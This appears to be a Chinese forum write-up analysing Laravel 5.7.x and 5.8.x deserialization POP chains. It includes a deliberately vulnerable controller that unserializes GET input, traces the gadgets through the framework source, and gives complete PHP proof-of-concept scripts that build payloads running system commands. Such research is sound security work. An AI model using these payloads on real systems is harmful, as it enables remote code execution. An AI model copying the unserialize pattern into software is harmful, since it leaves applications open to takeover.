5.8.x

漏洞复现

环境配置

写一个DemoController控制器
//DemoController.php

<?php
namespace App\Http\Controllers;

class DemoController extends Controller
{
    public function demo()
    {
        if(isset($_GET['c'])){
            $code = $_GET['c'];
            unserialize($code);
        }
        else{
            highlight_file(__FILE__);
        }
        return "Welcome to laravel5.8";
    }
}

然后在routes/web.php下添加路由

Route::get("/demo","\App\Http\Controllers\DemoController@demo");

漏洞分析

全局搜索排查__destruct()方法,找到Illuminate\Broadcasting\PendingBroadcast::__destruct()

public function __destruct()
    {
        $this->events->dispatch($this->event);
    }

因为eventsevent的值是可控的

public function __construct(Dispatcher $events, $event)
    {
        $this->event = $event;
        $this->events = $events;
    }

所以通过控制events参数可以调用任意类的dispatch()方法,所以先寻找可以利用的该方法,发现Illuminate\Bus\Dispatcher::dispatch()可利用

public function dispatch($command)
    {
        if ($this->queueResolver && $this->commandShouldBeQueued($command)) {
            return $this->dispatchToQueue($command);
        }

        return $this->dispatchNow($command);
    }

dispatchToQueue()方法里面有call_user_func()函数,我们来看一看方法内容

public function dispatchToQueue($command)
    {
        $connection = $command->connection ?? null;

        $queue = call_user_func($this->queueResolver, $connection);

        if (! $queue instanceof Queue) {
            throw new RuntimeException('Queue resolver did not return a Queue implementation.');
        }

        if (method_exists($command, 'queue')) {
            return $command->queue($queue, $command);
        }

        return $this->pushCommandToQueue($queue, $command);
    }

要想执行到这个方法那么就需要通过if判断,首先有$this->queueResolver的值,这个是我们可控的,给它赋值了就行了

public function __construct(Container $container, Closure $queueResolver = null)
    {
        $this->container = $container;
        $this->queueResolver = $queueResolver;
        $this->pipeline = new Pipeline($container);
    }

第二个判断是$this->commandShouldBeQueued($command),跟进一下commandShouldBeQueued()方法

protected function commandShouldBeQueued($command)
    {
        return $command instanceof ShouldQueue;
    }

该方法中要返回真,只需要让$command,也即PendingBroadcast类中的$this->event是一个继承于ShouldQueue接口的类即可。

可以利用find usage找一个继承ShouldQueue接口的类,例如BroadcastEvent类:

至此POP链构造完成,可以实现调用任意方法
总结一下涉及到的类和接口:

1、Illuminate\Broadcasting\PendingBroadcast对应的方法为__destruct()

2、Illuminate\Bus\Dispatcher对应的方法为dispatch()

3、Illuminate\Broadcasting\BroadcastEvent用于继承ShouldQueue接口

涉及到的变量:

1、 PendingBroadcast类中的event和events,前者用于继承ShouldQueue接口,后者用于实例化一个Dispatcher对象。

2、Dispatcher类中的queueResolver,用于想要执行的函数名。

3、BroadcastEvent类新创建一个变量connection,用于想要执行函数的参数

POC代码如下

<?php

namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events="",$event="")
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
}

namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver = "system";
    }
}

namespace Illuminate\Broadcasting{
    class BroadcastEvent
    {
        public $connection = "whoami";
    }
}

namespace{
    $d = new Illuminate\Bus\Dispatcher();
    $b = new Illuminate\Broadcasting\BroadcastEvent();
    $p = new Illuminate\Broadcasting\PendingBroadcast($d,$b);
    echo urlencode(serialize($p));
}

?>

5.7.x

漏洞复现

漏洞分析

这里首先来认识几个属性

public $test;           //一个实例化的类 Illuminate\Auth\GenericUser
protected $app;         //一个实例化的类 Illuminate\Foundation\Application
protected $command;     //要执行的php函数 system
protected $parameters;  //要执行的php函数的参数  array('id')

通过__destruct()方法进入run()方法

public function __destruct()
{
    if ($this->hasExecuted) {
        return;
    }

    $this->run();
}

跟进run()方法

public function run()
{
    $this->hasExecuted = true;

    $this->mockConsoleOutput();

    try {
        $exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);
    } catch (NoMatchingExpectationException $e) {
        if ($e->getMethodName() === 'askQuestion') {
            $this->test->fail('Unexpected question "'.$e->getActualArguments()[0]->getQuestion().'" was asked.');
        }

        throw $e;
    }

我们看到call()方法的两个参数都是用户可控的,首先得经过mockConsoleOutput()方法,跟进一下

protected function mockConsoleOutput()
{
    $mock = Mockery::mock(OutputStyle::class.'[askQuestion]', [
        (new ArrayInput($this->parameters)), $this->createABufferedOutputMock(),
    ]);

    foreach ($this->test->expectedQuestions as $i => $question) {
        $mock->shouldReceive('askQuestion')
            ->once()
            ->ordered()
            ->with(Mockery::on(function ($argument) use ($question) {
                return $argument->getQuestion() == $question[0];
            }))
            ->andReturnUsing(function () use ($question, $i) {
                unset($this->test->expectedQuestions[$i]);

                return $question[1];
            });
    }

    $this->app->bind(OutputStyle::class, function () use ($mock) {
        return $mock;
    });
}

我们先单步调试,发现可以成功执行Mockery::mock那一截代码到foreach循环,这里调用$this->test对象的expectedQuestions属性且应该为一个数组,但是该类并不存在expectedOutput属性,经过分析代码,我们发现这里只要能够返回一个数组代码就可以顺利进行下去

因此我们全文搜索__get()方法,让__get()方法返回我们想要的数组就可以了,这里我选择DefaultGenerator.php

class DefaultGenerator
{
    protected $default;

    public function __construct($default = null)
    {
        $this->default = $default;
    }

    /**
     * @param string $attribute
     *
     * @return mixed
     */
    public function __get($attribute)
    {
        return $this->default;
    }
    ......
}

我们对DefaultGenerator类进行实例化并传入数组array('hello'=>'ghtwf01'),打断点进行调试可以看到代码顺利执行下去了,这个时候POC如下

<?php
namespace Illuminate\Foundation\Testing{
    class PendingCommand{
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct($test, $app, $command, $parameters)
        {
            $this->app = $app;
            $this->test = $test;
            $this->command = $command;
            $this->parameters = $parameters;
        }
    }
}
namespace Faker{
    class DefaultGenerator{
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}
namespace Illuminate\Foundation{
    class Application{
        public function __construct($instances = []){}
    }
}
namespace{
    $defaultgenerator = new Faker\DefaultGenerator(array("hello"=>"ghtwf01"));
    $application = new Illuminate\Foundation\Application();
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator,$application,"system",array("id"));
    echo urlencode(serialize($pendingcommand));
}

接下来离开mockConsoleOutput()方法方法回到run()方法执行$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);,如果使用上面的POC单步调试这一步会报错,其中Kernel::class为固定值:"Illuminate\Contracts\Console\Kernel",跟进进入offsetGet()方法

public function offsetGet($key)
{
    return $this->make($key);
}

跟进make()方法

public function make($abstract, array $parameters = [])
{
    $abstract = $this->getAlias($abstract);

    if (isset($this->deferredServices[$abstract]) && ! isset($this->instances[$abstract])) {
        $this->loadDeferredProvider($abstract);
    }

    return parent::make($abstract, $parameters);
}

跟进父类的make()方法

public function make($abstract, array $parameters = [])
{
    return $this->resolve($abstract, $parameters);
}

跟进resolve()方法

protected function resolve($abstract, $parameters = [])
{
    $abstract = $this->getAlias($abstract);

    $needsContextualBuild = ! empty($parameters) || ! is_null(
        $this->getContextualConcrete($abstract)
    );

    // If an instance of the type is currently being managed as a singleton we'll
    // just return an existing instance instead of instantiating new instances
    // so the developer can keep using the same objects instance every time.
    if (isset($this->instances[$abstract]) && ! $needsContextualBuild) {
        return $this->instances[$abstract];
    }
    ......

根据我们上面的POC调试可以看到$this->instances这个数组是空数组,那么$this->instances[$abstract]就不存在而导致后面抛出异常。

跟着我们最终的POC看,return $this->instances[$abstract];=$this->instances["Illuminate\Contracts\Console\Kernel"]也就是返回了Illuminate\Foundation\Application对象,为什么要用这个对象?因为Illuminate\Foundation\Application类继承了 Illuminate\Container\Container类的call()方法

接着调用call()方法

public function call($callback, array $parameters = [], $defaultMethod = null)
{
    return BoundMethod::call($this, $callback, $parameters, $defaultMethod);
}

这里$callback = "system",$parameters[0] = "id",调用BoundMethod的call()静态方法

public static function call($container, $callback, array $parameters = [], $defaultMethod = null)
{
    if (static::isCallableWithAtSign($callback) || $defaultMethod) {
        return static::callClass($container, $callback, $parameters, $defaultMethod);
    }

    return static::callBoundMethod($container, $callback, function () use ($container, $callback, $parameters) {
        return call_user_func_array(
            $callback, static::getMethodDependencies($container, $callback, $parameters)
        );
    });
}

跟进isCallableWithAtSign()方法

protected static function isCallableWithAtSign($callback)
{
    return is_string($callback) && strpos($callback, '@') !== false;
}

作用只是判断确定给定的字符串是否使用Class@method语法

接着跟进callBoundMethod()函数,可以发现它的作用只是判断$callback是否为数组

protected static function callBoundMethod($container, $callback, $default)
{
    if (! is_array($callback)) {
        return $default instanceof Closure ? $default() : $default;
    }
    ......

继续跟进下面的匿名函数

function () use ($container, $callback, $parameters) {
            return call_user_func_array(
                $callback, static::getMethodDependencies($container, $callback, $parameters)
            );
        }

call_user_func_array()里面第一个参数是我们可控的值为system,第二个参数是通过getMethodDependencies()方法得来的,跟进一下

protected static function getMethodDependencies($container, $callback, array $parameters = [])
{
    $dependencies = [];

    foreach (static::getCallReflector($callback)->getParameters() as $parameter) {
        static::addDependencyForCallParameter($container, $parameter, $parameters, $dependencies);
    }

    return array_merge($dependencies, $parameters);
}

也就是将数组$dependencies和数组$parameters合并,因为$dependencies数组为空,所以最后返回的值也就是$parameters,值为id,所以最后就执行了call_user_func_array()

最终POC如下

<?php
namespace Illuminate\Foundation\Testing{
    class PendingCommand{
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct($test, $app, $command, $parameters)
        {
            $this->app = $app;
            $this->test = $test;
            $this->command = $command;
            $this->parameters = $parameters;
        }
    }
}
namespace Faker{
    class DefaultGenerator{
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}
namespace Illuminate\Foundation{
    class Application{
        protected $instances = [];

        public function __construct($instances = []){
            $this->instances['Illuminate\Contracts\Console\Kernel'] = $instances;
        }
    }
}
namespace{
    $defaultgenerator = new Faker\DefaultGenerator(array("hello"=>"ghtwf01"));
    $app = new Illuminate\Foundation\Application();
    $application = new Illuminate\Foundation\Application($app);
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand($defaultgenerator,$application,"system",array("id"));
    echo urlencode(serialize($pendingcommand));
}

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖